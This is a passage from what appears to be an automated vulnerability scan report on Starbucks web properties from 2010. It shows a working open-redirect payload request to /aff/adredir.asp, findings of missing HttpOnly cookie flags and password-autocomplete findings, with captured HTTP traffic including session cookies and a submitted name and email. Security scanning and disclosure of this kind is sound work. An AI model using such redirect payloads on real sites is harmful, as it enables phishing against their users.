<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

5. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 360
Content-Type: text/html
Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:30 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
...[SNIP]...

6. Cookie without HttpOnly flag set
There are 11 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://www.starbucksstore.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...

6.2. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Accept: */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14191
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=NGKAELCBMACFABOABHGPBGCG; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:32:40 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.3. http://www.starbucksstore.com/aff/adredir.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 153
Content-Type: text/html
Location: /?CCAID=SBPTPAHP1SHTB&Redir=
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: CCVC=Version=1%2E0&ID=1; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; path=/
Set-Cookie: SITESERVER=Version=1%2E0&ID=DE0B6174EFBD473A88E1F376B9850057; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=MBGMDLCBHELMFOOGJGHBALMA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:52 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&amp;Redir=">here</a>.</body>

6.4. http://www.starbucksstore.com/aff/adredir.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 153
Content-Type: text/html
Location: /?CCAID=SBPTPAHP1SHTB&Redir=
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: CCVC=Version=1%2E0&ID=1; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; path=/
Set-Cookie: SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:40 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&amp;Redir=">here</a>.</body>

6.5. http://www.starbucksstore.com/guestassist/shcontus.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /guestassist/shcontus.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/?CCAID=SBPTPAHP1SHTB&Redir=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20601
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=IMPPDLCBFMIGCMOPJPJFLFOO; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:21:14 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.6. http://www.starbucksstore.com/guestassist/shcontus.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20689
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; expires=Thu, 16-Dec-2010 08:00:00 GMT; domain=www.starbucksstore.com; path=/
Set-Cookie: CCVC=Version=1%2E0&ID=1; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: CCREFID=Version=1%2E0&ID=Direct; path=/
Set-Cookie: SITESERVER=Version=1%2E0&ID=8213B6214A894733BDB685D9935553E7; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSCDCCADA=KPMAELCBGJLKLOOPBBINAGDI; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:33:45 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.7. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaemailconfirm.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guestassist/shgaemailconfirm.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shgaform.asp
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1312787331-1289934823813; ASPSESSIONIDACACCDBA=POGLDLCBAAAEGEBIMPBBLEID; s_cc=true; __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.2.10.1289934824; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shgaform.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_submit2.gif%2526ot%253DIMAGE
Content-Length: 628

txtFirstName=Hoyt&txtMidInitial=&txtLastName=LLC&txtEMailAddress=h02332%40gmail.com&cboSubTopics=5&txtareaMessage=Hello+and+Good+Day-%0D%0A%0D%0AHoyt+LLC+from+David%2C+Ma..+this+is+David..%0D%0A2+issu
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12588
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=HCCBELCBGFGJAEFDAFOHNILL; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:39:41 GMT

<!--S1--><!--S0-->
   

<!-- Common Function include file -->

<!-- EMail include file -->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HT
...[SNIP]...

6.8. http://www.starbucksstore.com/guestassist/shgaform.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guestassist/shgaform.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; s_cc=true; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.1.10.1289934824; __qca=P0-1312787331-1289934823813; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shcontus.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_writeemail.gif%2526ot%253DIMAGE
Content-Length: 67

cboSubjects=1000&cboSubTopics=1006&EMail.x=83&EMail.y=9&EMail=email

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16848
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=JDPAELCBMFLNOOGBJGPPEOAB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:36:18 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.9. http://www.starbucksstore.com/guestassist/shgaform.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guestassist/shgaform.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK
Content-Length: 54

cboSubjects=1000&cboSubTopics=100&EMail.x=67&EMail.y=7

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=HABAELCBHLOMNPJNKIPJJFHG; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:22:10 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>

6.10. http://www.starbucksstore.com/coffee-machines/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:05 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.11. http://www.starbucksstore.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...

7. Password field with autocomplete enabled
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

7.1. http://www.starbucks.com/blog/610/check-in-at-starbucks

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/610/check-in-at-starbucks

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /blog/610/check-in-at-starbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:08 GMT
Connection: close
Content-Length: 65059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<div class="login">
<form action="https://www.starbucks.com/account/signin" class="siren" id="sign-in-form" method="post">
       <fieldset>
...[SNIP]...
</label>
                   <input class="field text medium" id="Account_PassWord" maxlength="200" name="Account.PassWord" tabindex="0" type="password" value="" />
               </li>
...[SNIP]...

7.2. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/611/my-starbucks-idea-s-100-000th-idea

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /blog/611/my-starbucks-idea-s-100-000th-idea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
